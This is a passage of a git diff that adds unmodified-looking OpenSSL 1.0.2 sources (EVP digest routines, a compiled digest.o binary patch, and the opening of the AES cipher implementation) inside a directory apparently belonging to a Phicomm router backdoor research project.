+            const EVP_MD *d = ENGINE_get_digest(impl, type->type);
+            if (!d) {
+                /* Same comment from evp_enc.c */
+                EVPerr(EVP_F_EVP_DIGESTINIT_EX, EVP_R_INITIALIZATION_ERROR);
+                ENGINE_finish(impl);
+                return 0;
+            }
+            /* We'll use the ENGINE's private digest definition */
+            type = d;
+            /*
+             * Store the ENGINE functional reference so we know 'type' came
+             * from an ENGINE and we need to release it when done.
+             */
+            ctx->engine = impl;
+        } else
+            ctx->engine = NULL;
+    } else if (!ctx->digest) {
+        EVPerr(EVP_F_EVP_DIGESTINIT_EX, EVP_R_NO_DIGEST_SET);
+        return 0;
+    }
+#endif
+    if (ctx->digest != type) {
+        if (ctx->digest && ctx->digest->ctx_size)
+            OPENSSL_free(ctx->md_data);
+        ctx->digest = type;
+        if (!(ctx->flags & EVP_MD_CTX_FLAG_NO_INIT) && type->ctx_size) {
+            ctx->update = type->update;
+            ctx->md_data = OPENSSL_malloc(type->ctx_size);
+            if (ctx->md_data == NULL) {
+                EVPerr(EVP_F_EVP_DIGESTINIT_EX, ERR_R_MALLOC_FAILURE);
+                return 0;
+            }
+        }
+    }
+#ifndef OPENSSL_NO_ENGINE
+ skip_to_init:
+#endif
+    if (ctx->pctx) {
+        int r;
+        r = EVP_PKEY_CTX_ctrl(ctx->pctx, -1, EVP_PKEY_OP_TYPE_SIG,
+                              EVP_PKEY_CTRL_DIGESTINIT, 0, ctx);
+        if (r <= 0 && (r != -2))
+            return 0;
+    }
+    if (ctx->flags & EVP_MD_CTX_FLAG_NO_INIT)
+        return 1;
+#ifdef OPENSSL_FIPS
+    if (FIPS_mode()) {
+        if (FIPS_digestinit(ctx, type))
+            return 1;
+        OPENSSL_free(ctx->md_data);
+        ctx->md_data = NULL;
+        return 0;
+    }
+#endif
+    return ctx->digest->init(ctx);
+}
+
+int EVP_DigestUpdate(EVP_MD_CTX *ctx, const void *data, size_t count)
+{
+#ifdef OPENSSL_FIPS
+    return FIPS_digestupdate(ctx, data, count);
+#else
+    return ctx->update(ctx, data, count);
+#endif
+}
+
+/* The caller can assume that this removes any secret data from the context */
+int EVP_DigestFinal(EVP_MD_CTX *ctx, unsigned char *md, unsigned int *size)
+{
+    int ret;
+    ret = EVP_DigestFinal_ex(ctx, md, size);
+    EVP_MD_CTX_cleanup(ctx);
+    return ret;
+}
+
+/* The caller can assume that this removes any secret data from the context */
+int EVP_DigestFinal_ex(EVP_MD_CTX *ctx, unsigned char *md, unsigned int *size)
+{
+#ifdef OPENSSL_FIPS
+    return FIPS_digestfinal(ctx, md, size);
+#else
+    int ret;
+
+    OPENSSL_assert(ctx->digest->md_size <= EVP_MAX_MD_SIZE);
+    ret = ctx->digest->final(ctx, md);
+    if (size != NULL)
+        *size = ctx->digest->md_size;
+    if (ctx->digest->cleanup) {
+        ctx->digest->cleanup(ctx);
+        EVP_MD_CTX_set_flags(ctx, EVP_MD_CTX_FLAG_CLEANED);
+    }
+    memset(ctx->md_data, 0, ctx->digest->ctx_size);
+    return ret;
+#endif
+}
+
+int EVP_MD_CTX_copy(EVP_MD_CTX *out, const EVP_MD_CTX *in)
+{
+    EVP_MD_CTX_init(out);
+    return EVP_MD_CTX_copy_ex(out, in);
+}
+
+int EVP_MD_CTX_copy_ex(EVP_MD_CTX *out, const EVP_MD_CTX *in)
+{
+    unsigned char *tmp_buf;
+    if ((in == NULL) || (in->digest == NULL)) {
+        EVPerr(EVP_F_EVP_MD_CTX_COPY_EX, EVP_R_INPUT_NOT_INITIALIZED);
+        return 0;
+    }
+#ifndef OPENSSL_NO_ENGINE
+    /* Make sure it's safe to copy a digest context using an ENGINE */
+    if (in->engine && !ENGINE_init(in->engine)) {
+        EVPerr(EVP_F_EVP_MD_CTX_COPY_EX, ERR_R_ENGINE_LIB);
+        return 0;
+    }
+#endif
+
+    if (out->digest == in->digest) {
+        tmp_buf = out->md_data;
+        EVP_MD_CTX_set_flags(out, EVP_MD_CTX_FLAG_REUSE);
+    } else
+        tmp_buf = NULL;
+    EVP_MD_CTX_cleanup(out);
+    memcpy(out, in, sizeof *out);
+
+    if (in->md_data && out->digest->ctx_size) {
+        if (tmp_buf)
+            out->md_data = tmp_buf;
+        else {
+            out->md_data = OPENSSL_malloc(out->digest->ctx_size);
+            if (!out->md_data) {
+                EVPerr(EVP_F_EVP_MD_CTX_COPY_EX, ERR_R_MALLOC_FAILURE);
+                return 0;
+            }
+        }
+        memcpy(out->md_data, in->md_data, out->digest->ctx_size);
+    }
+
+    out->update = in->update;
+
+    if (in->pctx) {
+        out->pctx = EVP_PKEY_CTX_dup(in->pctx);
+        if (!out->pctx) {
+            EVP_MD_CTX_cleanup(out);
+            return 0;
+        }
+    }
+
+    if (out->digest->copy)
+        return out->digest->copy(out, in);
+
+    return 1;
+}
+
+int EVP_Digest(const void *data, size_t count,
+               unsigned char *md, unsigned int *size, const EVP_MD *type,
+               ENGINE *impl)
+{
+    EVP_MD_CTX ctx;
+    int ret;
+
+    EVP_MD_CTX_init(&ctx);
+    EVP_MD_CTX_set_flags(&ctx, EVP_MD_CTX_FLAG_ONESHOT);
+    ret = EVP_DigestInit_ex(&ctx, type, impl)
+        && EVP_DigestUpdate(&ctx, data, count)
+        && EVP_DigestFinal_ex(&ctx, md, size);
+    EVP_MD_CTX_cleanup(&ctx);
+
+    return ret;
+}
+
+void EVP_MD_CTX_destroy(EVP_MD_CTX *ctx)
+{
+    if (ctx) {
+        EVP_MD_CTX_cleanup(ctx);
+        OPENSSL_free(ctx);
+    }
+}
+
+/* This call frees resources associated with the context */
+int EVP_MD_CTX_cleanup(EVP_MD_CTX *ctx)
+{
+#ifndef OPENSSL_FIPS
+    /*
+     * Don't assume ctx->md_data was cleaned in EVP_Digest_Final, because
+     * sometimes only copies of the context are ever finalised.
+     */
+    if (ctx->digest && ctx->digest->cleanup
+        && !EVP_MD_CTX_test_flags(ctx, EVP_MD_CTX_FLAG_CLEANED))
+        ctx->digest->cleanup(ctx);
+    if (ctx->digest && ctx->digest->ctx_size && ctx->md_data
+        && !EVP_MD_CTX_test_flags(ctx, EVP_MD_CTX_FLAG_REUSE)) {
+        OPENSSL_cleanse(ctx->md_data, ctx->digest->ctx_size);
+        OPENSSL_free(ctx->md_data);
+    }
+#endif
+    if (ctx->pctx)
+        EVP_PKEY_CTX_free(ctx->pctx);
+#ifndef OPENSSL_NO_ENGINE
+    if (ctx->engine)
+        /*
+         * The EVP_MD we used belongs to an ENGINE, release the functional
+         * reference we held for this reason.
+         */
+        ENGINE_finish(ctx->engine);
+#endif
+#ifdef OPENSSL_FIPS
+    FIPS_md_ctx_cleanup(ctx);
+#endif
+    memset(ctx, '\0', sizeof *ctx);
+
+    return 1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/digest.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/digest.o
new file mode 100644
index 0000000000000000000000000000000000000000..b2445b0c81274410c06e3a01e92a5702bc0ed710
GIT binary patch
literal 5376
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_aes.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_aes.c
new file mode 100644
index 0000000..41844bc
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_aes.c
@@ -0,0 +1,2021 @@
+/* ====================================================================
+ * Copyright (c) 2001-2011 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ */
+
+#include <openssl/opensslconf.h>
+#ifndef OPENSSL_NO_AES
+# include <openssl/evp.h>
+# include <openssl/err.h>
+# include <string.h>
+# include <assert.h>
+# include <openssl/aes.h>
+# include "evp_locl.h"
+# include "modes_lcl.h"
+# include <openssl/rand.h>
+
+# undef EVP_CIPH_FLAG_FIPS
+# define EVP_CIPH_FLAG_FIPS 0
+
+typedef struct {
+    union {
+        double align;
+        AES_KEY ks;
+    } ks;
+    block128_f block;
+    union {
+        cbc128_f cbc;
+        ctr128_f ctr;
+    } stream;
+} EVP_AES_KEY;
+
+typedef struct {
+    union {
+        double align;
+        AES_KEY ks;
+    } ks;                       /* AES key schedule to use */
+    int key_set;                /* Set if key initialised */
+    int iv_set;                 /* Set if an iv is set */
+    GCM128_CONTEXT gcm;
+    unsigned char *iv;          /* Temporary IV store */
+    int ivlen;                  /* IV length */
+    int taglen;
+    int iv_gen;                 /* It is OK to generate IVs */
+    int tls_aad_len;            /* TLS AAD length */
+    ctr128_f ctr;
+} EVP_AES_GCM_CTX;
+
+typedef struct {
+    union {
+        double align;
+        AES_KEY ks;
+    } ks1, ks2;                 /* AES key schedules to use */
+    XTS128_CONTEXT xts;
+    void (*stream) (const unsigned char *in,
+                    unsigned char *out, size_t length,
+                    const AES_KEY *key1, const AES_KEY *key2,
+                    const unsigned char iv[16]);
+} EVP_AES_XTS_CTX;
+
+typedef struct {
+    union {
+        double align;
+        AES_KEY ks;
+    } ks;                       /* AES key schedule to use */
+    int key_set;                /* Set if key initialised */
+    int iv_set;                 /* Set if an iv is set */
+    int tag_set;                /* Set if tag is valid */
+    int len_set;                /* Set if message length set */
+    int L, M;                   /* L and M parameters from RFC3610 */
+    CCM128_CONTEXT ccm;
+    ccm128_f str;
+} EVP_AES_CCM_CTX;
+
+# define MAXBITCHUNK     ((size_t)1<<(sizeof(size_t)*8-4))
+
+# ifdef VPAES_ASM
+int vpaes_set_encrypt_key(const unsigned char *userKey, int bits,
+                          AES_KEY *key);
+int vpaes_set_decrypt_key(const unsigned char *userKey, int bits,
+                          AES_KEY *key);
+
+void vpaes_encrypt(const unsigned char *in, unsigned char *out,
+                   const AES_KEY *key);
+void vpaes_decrypt(const unsigned char *in, unsigned char *out,
+                   const AES_KEY *key);
+
+void vpaes_cbc_encrypt(const unsigned char *in,
+                       unsigned char *out,
+                       size_t length,
+                       const AES_KEY *key, unsigned char *ivec, int enc);
+# endif
+# ifdef BSAES_ASM
+void bsaes_cbc_encrypt(const unsigned char *in, unsigned char *out,
+                       size_t length, const AES_KEY *key,
+                       unsigned char ivec[16], int enc);
+void bsaes_ctr32_encrypt_blocks(const unsigned char *in, unsigned char *out,
+                                size_t len, const AES_KEY *key,
+                                const unsigned char ivec[16]);
+void bsaes_xts_encrypt(const unsigned char *inp, unsigned char *out,
+                       size_t len, const AES_KEY *key1,
+                       const AES_KEY *key2, const unsigned char iv[16]);
+void bsaes_xts_decrypt(const unsigned char *inp, unsigned char *out,
+                       size_t len, const AES_KEY *key1,
+                       const AES_KEY *key2, const unsigned char iv[16]);
+# endif
+# ifdef AES_CTR_ASM
+void AES_ctr32_encrypt(const unsigned char *in, unsigned char *out,
+                       size_t blocks, const AES_KEY *key,
+                       const unsigned char ivec[AES_BLOCK_SIZE]);
+# endif
+# ifdef AES_XTS_ASM
+void AES_xts_encrypt(const char *inp, char *out, size_t len,
+                     const AES_KEY *key1, const AES_KEY *key2,
+                     const unsigned char iv[16]);
+void AES_xts_decrypt(const char *inp, char *out, size_t len,
+                     const AES_KEY *key1, const AES_KEY *key2,
+                     const unsigned char iv[16]);
+# endif
+
+# if     defined(OPENSSL_CPUID_OBJ) && (defined(__powerpc__) || defined(__ppc__) || defined(_ARCH_PPC))
+#  include "ppc_arch.h"
+#  ifdef VPAES_ASM
+#   define VPAES_CAPABLE (OPENSSL_ppccap_P & PPC_ALTIVEC)
+#  endif
+#  define HWAES_CAPABLE  (OPENSSL_ppccap_P & PPC_CRYPTO207)
+#  define HWAES_set_encrypt_key aes_p8_set_encrypt_key
+#  define HWAES_set_decrypt_key aes_p8_set_decrypt_key
+#  define HWAES_encrypt aes_p8_encrypt
+#  define HWAES_decrypt aes_p8_decrypt
+#  define HWAES_cbc_encrypt aes_p8_cbc_encrypt
+#  define HWAES_ctr32_encrypt_blocks aes_p8_ctr32_encrypt_blocks
+# endif
+
+# if     defined(AES_ASM) && !defined(I386_ONLY) &&      (  \
+        ((defined(__i386)       || defined(__i386__)    || \
+          defined(_M_IX86)) && defined(OPENSSL_IA32_SSE2))|| \
+        defined(__x86_64)       || defined(__x86_64__)  || \
+        defined(_M_AMD64)       || defined(_M_X64)      || \
+        defined(__INTEL__)                              )
+
+extern unsigned int OPENSSL_ia32cap_P[];
+
+#  ifdef VPAES_ASM
+#   define VPAES_CAPABLE   (OPENSSL_ia32cap_P[1]&(1<<(41-32)))
+#  endif
+#  ifdef BSAES_ASM
+#   define BSAES_CAPABLE   (OPENSSL_ia32cap_P[1]&(1<<(41-32)))
+#  endif
+/*
+ * AES-NI section
+ */
+#  define AESNI_CAPABLE   (OPENSSL_ia32cap_P[1]&(1<<(57-32)))
+
+int aesni_set_encrypt_key(const unsigned char *userKey, int bits,
+                          AES_KEY *key);
+int aesni_set_decrypt_key(const unsigned char *userKey, int bits,
+                          AES_KEY *key);
+
+void aesni_encrypt(const unsigned char *in, unsigned char *out,
+                   const AES_KEY *key);
+void aesni_decrypt(const unsigned char *in, unsigned char *out,
+                   const AES_KEY *key);
+
+void aesni_ecb_encrypt(const unsigned char *in,
+                       unsigned char *out,
+                       size_t length, const AES_KEY *key, int enc);
+void aesni_cbc_encrypt(const unsigned char *in,
+                       unsigned char *out,
+                       size_t length,
+                       const AES_KEY *key, unsigned char *ivec, int enc);
+
+void aesni_ctr32_encrypt_blocks(const unsigned char *in,
+                                unsigned char *out,
+                                size_t blocks,
+                                const void *key, const unsigned char *ivec);
+
+void aesni_xts_encrypt(const unsigned char *in,
+                       unsigned char *out,
+                       size_t length,
+                       const AES_KEY *key1, const AES_KEY *key2,
+                       const unsigned char iv[16]);
+
+void aesni_xts_decrypt(const unsigned char *in,
+                       unsigned char *out,
+                       size_t length,
+                       const AES_KEY *key1, const AES_KEY *key2,
+                       const unsigned char iv[16]);
+
+void aesni_ccm64_encrypt_blocks(const unsigned char *in,
+                                unsigned char *out,
+                                size_t blocks,
+                                const void *key,
+                                const unsigned char ivec[16],
+                                unsigned char cmac[16]);
+
+void aesni_ccm64_decrypt_blocks(const unsigned char *in,
+                                unsigned char *out,
+                                size_t blocks,
+                                const void *key,
+                                const unsigned char ivec[16],
+                                unsigned char cmac[16]);
+
+#  if defined(__x86_64) || defined(__x86_64__) || defined(_M_AMD64) || defined(_M_X64)
+size_t aesni_gcm_encrypt(const unsigned char *in,
+                         unsigned char *out,
+                         size_t len,
+                         const void *key, unsigned char ivec[16], u64 *Xi);
+#   define AES_gcm_encrypt aesni_gcm_encrypt
+size_t aesni_gcm_decrypt(const unsigned char *in,
+                         unsigned char *out,
+                         size_t len,
+                         const void *key, unsigned char ivec[16], u64 *Xi);
+#   define AES_gcm_decrypt aesni_gcm_decrypt
+void gcm_ghash_avx(u64 Xi[2], const u128 Htable[16], const u8 *in,
+                   size_t len);
+#   define AES_GCM_ASM(gctx)       (gctx->ctr==aesni_ctr32_encrypt_blocks && \
+                                 gctx->gcm.ghash==gcm_ghash_avx)
+#   define AES_GCM_ASM2(gctx)      (gctx->gcm.block==(block128_f)aesni_encrypt && \
+                                 gctx->gcm.ghash==gcm_ghash_avx)
+#   undef AES_GCM_ASM2          /* minor size optimization */
+#  endif
+
+static int aesni_init_key(EVP_CIPHER_CTX *ctx, const unsigned char *key,
+                          const unsigned char *iv, int enc)
+{
+    int ret, mode;
+    EVP_AES_KEY *dat = (EVP_AES_KEY *) ctx->cipher_data;
+
+    mode = ctx->cipher->flags & EVP_CIPH_MODE;
+    if ((mode == EVP_CIPH_ECB_MODE || mode == EVP_CIPH_CBC_MODE)
+        && !enc) {
+        ret = aesni_set_decrypt_key(key, ctx->key_len * 8, ctx->cipher_data);
+        dat->block = (block128_f) aesni_decrypt;
+        dat->stream.cbc = mode == EVP_CIPH_CBC_MODE ?
+            (cbc128_f) aesni_cbc_encrypt : NULL;
+    } else {
+        ret = aesni_set_encrypt_key(key, ctx->key_len * 8, ctx->cipher_data);
+        dat->block = (block128_f) aesni_encrypt;
+        if (mode == EVP_CIPH_CBC_MODE)
+            dat->stream.cbc = (cbc128_f) aesni_cbc_encrypt;
+        else if (mode == EVP_CIPH_CTR_MODE)
+            dat->stream.ctr = (ctr128_f) aesni_ctr32_encrypt_blocks;
+        else
+            dat->stream.cbc = NULL;
+    }
+
+    if (ret < 0) {
+        EVPerr(EVP_F_AESNI_INIT_KEY, EVP_R_AES_KEY_SETUP_FAILED);
+        return 0;
+    }
+
+    return 1;
+}
+
+static int aesni_cbc_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                            const unsigned char *in, size_t len)
+{
+    aesni_cbc_encrypt(in, out, len, ctx->cipher_data, ctx->iv, ctx->encrypt);
+
+    return 1;
+}
+
+static int aesni_ecb_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                            const unsigned char *in, size_t len)
+{
+    size_t bl = ctx->cipher->block_size;
+
+    if (len < bl)
+        return 1;
+
+    aesni_ecb_encrypt(in, out, len, ctx->cipher_data, ctx->encrypt);
+
+    return 1;
+}
+
+#  define aesni_ofb_cipher aes_ofb_cipher
+static int aesni_ofb_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                            const unsigned char *in, size_t len);
+
+#  define aesni_cfb_cipher aes_cfb_cipher
+static int aesni_cfb_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                            const unsigned char *in, size_t len);
+
+#  define aesni_cfb8_cipher aes_cfb8_cipher
+static int aesni_cfb8_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                             const unsigned char *in, size_t len);
+
+#  define aesni_cfb1_cipher aes_cfb1_cipher
+static int aesni_cfb1_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                             const unsigned char *in, size_t len);
+
+#  define aesni_ctr_cipher aes_ctr_cipher
+static int aesni_ctr_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                            const unsigned char *in, size_t len);
+
+static int aesni_gcm_init_key(EVP_CIPHER_CTX *ctx, const unsigned char *key,
+                              const unsigned char *iv, int enc)
+{
+    EVP_AES_GCM_CTX *gctx = ctx->cipher_data;
+    if (!iv && !key)
+        return 1;
+    if (key) {
+        aesni_set_encrypt_key(key, ctx->key_len * 8, &gctx->ks.ks);
+        CRYPTO_gcm128_init(&gctx->gcm, &gctx->ks, (block128_f) aesni_encrypt);
+        gctx->ctr = (ctr128_f) aesni_ctr32_encrypt_blocks;
+        /*
+         * If we have an iv can set it directly, otherwise use saved IV.
+         */
+        if (iv == NULL && gctx->iv_set)
+            iv = gctx->iv;
+        if (iv) {
+            CRYPTO_gcm128_setiv(&gctx->gcm, iv, gctx->ivlen);
+            gctx->iv_set = 1;
+        }
+        gctx->key_set = 1;
+    } else {
+        /* If key set use IV, otherwise copy */
+        if (gctx->key_set)
+            CRYPTO_gcm128_setiv(&gctx->gcm, iv, gctx->ivlen);
+        else
+            memcpy(gctx->iv, iv, gctx->ivlen);
+        gctx->iv_set = 1;
+        gctx->iv_gen = 0;
+    }
+    return 1;
+}
+
+#  define aesni_gcm_cipher aes_gcm_cipher
+static int aesni_gcm_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                            const unsigned char *in, size_t len);
+
+static int aesni_xts_init_key(EVP_CIPHER_CTX *ctx, const unsigned char *key,
+                              const unsigned char *iv, int enc)
+{
+    EVP_AES_XTS_CTX *xctx = ctx->cipher_data;
+    if (!iv && !key)
+        return 1;
+
+    if (key) {
+        /* key_len is two AES keys */
+        if (enc) {
+            aesni_set_encrypt_key(key, ctx->key_len * 4, &xctx->ks1.ks);
+            xctx->xts.block1 = (block128_f) aesni_encrypt;
+            xctx->stream = aesni_xts_encrypt;
+        } else {
+            aesni_set_decrypt_key(key, ctx->key_len * 4, &xctx->ks1.ks);
+            xctx->xts.block1 = (block128_f) aesni_decrypt;
+            xctx->stream = aesni_xts_decrypt;
+        }
+
+        aesni_set_encrypt_key(key + ctx->key_len / 2,
+                              ctx->key_len * 4, &xctx->ks2.ks);
+        xctx->xts.block2 = (block128_f) aesni_encrypt;
+
+        xctx->xts.key1 = &xctx->ks1;
+    }
+
+    if (iv) {
+        xctx->xts.key2 = &xctx->ks2;
+        memcpy(ctx->iv, iv, 16);
+    }
+
+    return 1;
+}
+
+#  define aesni_xts_cipher aes_xts_cipher
+static int aesni_xts_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                            const unsigned char *in, size_t len);
+
+static int aesni_ccm_init_key(EVP_CIPHER_CTX *ctx, const unsigned char *key,
+                              const unsigned char *iv, int enc)
+{
+    EVP_AES_CCM_CTX *cctx = ctx->cipher_data;
+    if (!iv && !key)
+        return 1;
+    if (key) {
+        aesni_set_encrypt_key(key, ctx->key_len * 8, &cctx->ks.ks);
+        CRYPTO_ccm128_init(&cctx->ccm, cctx->M, cctx->L,
+                           &cctx->ks, (block128_f) aesni_encrypt);
+        cctx->str = enc ? (ccm128_f) aesni_ccm64_encrypt_blocks :
+            (ccm128_f) aesni_ccm64_decrypt_blocks;
+        cctx->key_set = 1;
+    }
+    if (iv) {
+        memcpy(ctx->iv, iv, 15 - cctx->L);
+        cctx->iv_set = 1;
+    }
+    return 1;
+}
+
+#  define aesni_ccm_cipher aes_ccm_cipher
+static int aesni_ccm_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                            const unsigned char *in, size_t len);
+
+#  define BLOCK_CIPHER_generic(nid,keylen,blocksize,ivlen,nmode,mode,MODE,flags) \
+static const EVP_CIPHER aesni_##keylen##_##mode = { \
+        nid##_##keylen##_##nmode,blocksize,keylen/8,ivlen, \
+        flags|EVP_CIPH_##MODE##_MODE,   \
+        aesni_init_key,                 \
+        aesni_##mode##_cipher,          \
+        NULL,                           \
+        sizeof(EVP_AES_KEY),            \
+        NULL,NULL,NULL,NULL }; \
